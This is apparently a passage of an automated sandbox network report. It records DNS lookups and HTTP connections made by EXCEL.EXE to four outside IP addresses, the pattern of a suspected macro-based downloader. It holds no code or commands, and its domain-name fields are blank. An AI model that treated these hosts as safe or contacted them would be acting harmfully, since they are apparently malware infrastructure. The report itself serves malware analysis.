Feb 23, 2021 15:59:53.428792953 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:53.646315098 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:53.706569910 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:54.063407898 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:54.216335058 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:55.116333008 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:55.405550003 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:55.901449919 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:55.961211920 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:56.647672892 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:56.697839022 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:57.724984884 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:57.773802042 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 15:59:58.768656015 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 15:59:58.826854944 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:00.216042042 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:00.267188072 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:01.156286001 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:01.214006901 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:02.130615950 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:02.188062906 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:04.251084089 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:04.302571058 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:10.667418957 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:10.726037979 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:11.955070972 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:12.009094000 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:30.100255013 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:30.165819883 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:47.600977898 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:47.654854059 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:00:48.304879904 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:00:48.356266975 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:01:01.159354925 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:01:01.227663994 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Feb 23, 2021 16:01:25.464582920 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Feb 23, 2021 16:01:25.536199093 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 23, 2021 15:59:53.371618986 CET | 192.168.2.3 | 8.8.8.8 | 0xb938 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 15:59:54.063407898 CET | 192.168.2.3 | 8.8.8.8 | 0x5b71 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 15:59:55.116333008 CET | 192.168.2.3 | 8.8.8.8 | 0xd82d | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 15:59:57.724984884 CET | 192.168.2.3 | 8.8.8.8 | 0x885d | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 23, 2021 15:59:53.428792953 CET | 8.8.8.8 | 192.168.2.3 | 0xb938 | No error (0) | 72.52.227.180 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 15:59:54.216335058 CET | 8.8.8.8 | 192.168.2.3 | 0x5b71 | No error (0) | 162.241.80.6 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 15:59:55.405550003 CET | 8.8.8.8 | 192.168.2.3 | 0xd82d | No error (0) | 138.36.237.100 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 15:59:57.773802042 CET | 8.8.8.8 | 192.168.2.3 | 0x885d | No error (0) | 91.199.212.52 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 16:00:47.654854059 CET | 8.8.8.8 | 192.168.2.3 | 0xc792 | No error (0) | www.tm.a.prd.aadg.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49717 | 72.52.227.180 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 15:59:53.589113951 CET | 1090 | OUT | |
Feb 23, 2021 15:59:54.049882889 CET | 1091 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49719 | 162.241.80.6 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 15:59:54.379425049 CET | 1099 | OUT | |
Feb 23, 2021 15:59:55.088042021 CET | 1103 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.3 | 49720 | 138.36.237.100 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 15:59:55.754218102 CET | 1104 | OUT | |
Feb 23, 2021 15:59:56.826869011 CET | 1106 | IN | |
Feb 23, 2021 15:59:56.826890945 CET | 1106 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.3 | 49723 | 91.199.212.52 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 15:59:57.843202114 CET | 1123 | OUT | |
Feb 23, 2021 15:59:57.904131889 CET | 1125 | IN |